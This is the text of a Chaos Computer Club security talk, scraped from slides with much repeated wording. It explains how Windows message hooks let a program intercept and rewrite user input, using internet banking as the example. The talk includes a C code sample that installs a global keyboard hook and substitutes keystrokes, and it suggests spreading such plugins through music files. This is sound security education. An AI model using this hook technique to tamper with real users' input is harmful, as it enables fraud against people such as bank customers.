Attacking the Attacking the User- -Machine Machine User - - PowerPoint PPT Presentation

attacking the attacking the user machine machine user
SMART_READER_LITE
LIVE PREVIEW

Attacking the Attacking the User- -Machine Machine User - - PowerPoint PPT Presentation

Mar 09, 2023 285 likes •460 views

Attacking the Attacking the User- -Machine Machine User Interface Interface A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org org A Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club

slide-1
SLIDE 1

Attacking the Attacking the User User-

  • Machine

Machine Interface Interface

A A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org

  • rg

Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club ERFA Kreis Ulm http:// http://www www. .ulm ulm. .ccc ccc.de .de, http:// , http://www www. .ccc ccc.de .de

slide-2
SLIDE 2

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

What's What's up? up?

  • Everybody

Everybody searches searches for for security security for for machine machine-

  • machine

machine interfaces interfaces. .

  • Some implementations

Some implementations of

  • f cryptography

cryptography are are OK OK for now for now. .

  • Nobody

Nobody thinks about the security thinks about the security problems problems of

  • f the

the user user-

  • machine

machine interfaces interfaces. .

slide-3
SLIDE 3

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Internet

Example: internet Example: internet-

  • banking

banking

I' I'm m in! ! That That was was eas easy! y! Mainfram Mainframe at the he ban bank Webs bserv erver PC PC

slide-4
SLIDE 4

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

The The idea idea is is not not really really new new: :

slide-5
SLIDE 5

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

How does the How does the Windoze Windoze GUI GUI work? work?

  • Windoze

Windoze is a timesharing system is a timesharing system

  • hardware drivers in the kernel, mostly interrupt

hardware drivers in the kernel, mostly interrupt driven driven

  • Processes and threads in the user land

Processes and threads in the user land

  • Windoze

Windoze is a message based GUI is a message based GUI

  • System Message Queue

System Message Queue -

  • > System Dispatcher

> System Dispatcher

  • > Thread Message Queue

> Thread Message Queue -

  • > Thread Dispatcher

> Thread Dispatcher

  • >

> WindowProc WindowProc for every Window Class. for every Window Class.

slide-6
SLIDE 6

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

How does the How does the Windoze Windoze GUI GUI work? work?

“Click!” CPU IRQ12 Driver

WM_NC WM_NCHITTE HITTEST ST

System-Message-Q Thread-Message-Q WindowProc (Message Handler) System Dispatcher Thread Dispatcher Translate

slide-7
SLIDE 7

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

hello, world hello, world

int int WinMain WinMain(HINSTANCE (HINSTANCE hInstance hInstance, , HINSTANCE HINSTANCE hPrevInstance hPrevInstance, , LPSTR LPSTR lpCmdLine lpCmdLine, , int nCmdShow int nCmdShow) { ) { MSG MSG msg msg; ; if (! if (!hPrevInstance hPrevInstance) ) InitApp InitApp( (hInstance hInstance); ); InitInstance InitInstance( (hInstance hInstance, , nCmdShow nCmdShow); ); while ( while (GetMessage GetMessage(& (&msg msg, NULL, 0, 0)) { , NULL, 0, 0)) { TranslateMessage TranslateMessage(& (&msg msg); ); DispatchMessage DispatchMessage(& (&msg msg); ); } } return msg. return msg.wParam wParam; ; } }

Thread Dispatcher

slide-8
SLIDE 8

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

hello, world hello, world

ATOM ATOM InitApp InitApp(HINSTANCE (HINSTANCE hInstance hInstance) { ) { WNDCLASSEX WNDCLASSEX wcex wcex; ; memset memset(& (&wcex wcex, 0, , 0, sizeof sizeof(WNDCLASSEX)); (WNDCLASSEX)); wcex wcex. .cbSize cbSize = = sizeof sizeof(WNDCLASSEX); (WNDCLASSEX); wcex wcex.style = CS_HREDRAW | CS_VREDRAW; .style = CS_HREDRAW | CS_VREDRAW; wcex wcex. .lpfnWndProc lpfnWndProc = (WNDPROC) = (WNDPROC) WndProc WndProc; ; wcex wcex. .hInstance hInstance = = hInstance hInstance; ; wcex wcex. .hIcon hIcon = = LoadIcon LoadIcon(NULL, IDI_APPLICATION); (NULL, IDI_APPLICATION); wcex wcex. .hCursor hCursor = = LoadCursor LoadCursor(NULL, IDC_ARROW); (NULL, IDC_ARROW); wcex wcex. .hbrBackground hbrBackground = (HBRUSH)(COLOR_WINDOW+1); = (HBRUSH)(COLOR_WINDOW+1); wcex wcex. .lpszClassName lpszClassName = " = "HelloWorldClass HelloWorldClass"; "; return return RegisterClassEx RegisterClassEx(& (&wcex wcex); ); } }

Message Handler

slide-9
SLIDE 9

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

hello, world hello, world

LRESULT CALLBACK LRESULT CALLBACK WndProc WndProc(HWND (HWND hWnd hWnd, UINT message, , UINT message, WPARAM WPARAM wParam wParam, LPARAM , LPARAM lParam lParam) { ) { PAINTSTRUCT PAINTSTRUCT ps ps; ; HDC HDC hdc hdc; ; switch (message) { switch (message) { case WM_PAINT: case WM_PAINT: hdc hdc = = BeginPaint BeginPaint( (hWnd hWnd, & , &ps ps); ); RECT RECT rt rt; ; GetClientRect GetClientRect( (hWnd hWnd, & , &rt rt); ); DrawText DrawText( (hdc hdc, "hello, world", 12, & , "hello, world", 12, &rt rt, , DT_CENTER); DT_CENTER); EndPaint EndPaint( (hWnd hWnd, & , &ps ps); ); break; break; case WM_CLICK: case WM_CLICK: ... ... } }

slide-10
SLIDE 10

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

The weak point: Hooks. The weak point: Hooks.

  • Message Hooks can be installed from any

Message Hooks can be installed from any application before any message dispatcher. application before any message dispatcher.

  • Messages could be filtered or altered and

Messages could be filtered or altered and transported to the Message Handlers. transported to the Message Handlers.

  • Is there a security system? No, Sir.

Is there a security system? No, Sir.

  • Attacking pattern: Man in the middle attack.

Attacking pattern: Man in the middle attack.

slide-11
SLIDE 11

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Man Man-

  • In

In-

  • The

The-

  • Middle

Middle-

  • Attack.

Attack.

“Click!” Windows Application (i.e. IE for banking ;-) Message Hook

slide-12
SLIDE 12

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Code sample Code sample

void void InstallHook InstallHook() { () { m_ m_hLib hLib = = LoadLibrary LoadLibrary("Hook. ("Hook.dll dll"); "); FARPROC FARPROC pSysMsgProc pSysMsgProc = = GetProcAddress GetProcAddress(m_ (m_hLib hLib, , " "KeyboardProc KeyboardProc"); "); PSETHOOKHANDLE PSETHOOKHANDLE pSetHookHandle pSetHookHandle = = (PSETHOOKHANDLE) (PSETHOOKHANDLE) GetProcAddress GetProcAddress(m_ (m_hLib hLib, , " "SetInfo SetInfo"); "); m_ m_hHook hHook = = SetWindowsHookEx SetWindowsHookEx(WH_KEYBOARD, (WH_KEYBOARD, (HOOKPROC) (HOOKPROC) pSysMsgProc pSysMsgProc, m_ , m_hLib hLib, 0); , 0); (* (*pSetHookHandle pSetHookHandle)(m_ )(m_hHook hHook); ); } }

slide-13
SLIDE 13

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Code sample Code sample

static HHOOK static HHOOK hHook hHook = 0; = 0; void void SetInfo SetInfo(HHOOK (HHOOK newHook newHook) { ) {hHook hHook = = newHook newHook;} ;} LRESULT CALLBACK LRESULT CALLBACK KeyboardProc KeyboardProc( (int nCode int nCode, WPARAM , WPARAM wParam wParam, , LPARAM LPARAM lParam lParam) { ) { if ( if (nCode nCode == HC_ACTION && == HC_ACTION && wParam wParam == VK_DECIMAL) { == VK_DECIMAL) { // // hPlayback hPlayback = = SetWindowsHookEx SetWindowsHookEx(WH_JOURNALPLAYBACK, (WH_JOURNALPLAYBACK, // // JournalPlaybackProc JournalPlaybackProc, , theApp theApp.m_ .m_hInstance hInstance, 0); , 0); if ( if (lParam lParam & 0x80000000) & 0x80000000) keybd keybd_event(13502, 52, KEYEVENTF_KEYUP, 0); _event(13502, 52, KEYEVENTF_KEYUP, 0); else else keybd keybd_event(13502, 52, 0, 0); _event(13502, 52, 0, 0); return 1; return 1; } } return return CallNextHookEx CallNextHookEx( (hHook hHook, , nCode nCode, , wParam wParam, ,lParam lParam); ); } }

slide-14
SLIDE 14

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Being creative with internet Being creative with internet banking banking

  • User enters "42", computer understands

User enters "42", computer understands "23", user reads "42" "23", user reads "42"

  • User is authenticating this transaction.

User is authenticating this transaction.

  • Computer is transacting "23".

Computer is transacting "23".

  • With an Internet Explorer

With an Internet Explorer plugin plugin we we don't need any extra processes. don't need any extra processes.

  • Distributing such

Distributing such plugins plugins made easy by made easy by using music files with Windows XP. using music files with Windows XP.

slide-15
SLIDE 15

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

And now? What can we do? And now? What can we do?

  • Better forget Windows for banking

Better forget Windows for banking purposes. purposes.

  • Better forget the Macintosh for banking

Better forget the Macintosh for banking purposes also. purposes also.

  • X11 offers a security system. But who

X11 offers a security system. But who knows that and who is using it? knows that and who is using it?

  • Better: cold boot from CD.

Better: cold boot from CD.

slide-16
SLIDE 16

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Chaos Computer Club. Chaos Computer Club.

Kabelsalat ist gesund. Kabelsalat ist gesund. Thank Thank you you! ! Volker Birk, CCC ERFA Kreis Ulm Volker Birk, CCC ERFA Kreis Ulm mailto: mailto:dingens dingens@ @bumens bumens. .org

  • rg

http:// http://www www. .ulm ulm. .ccc ccc.de .de http:// http://www www. .ccc ccc.de .de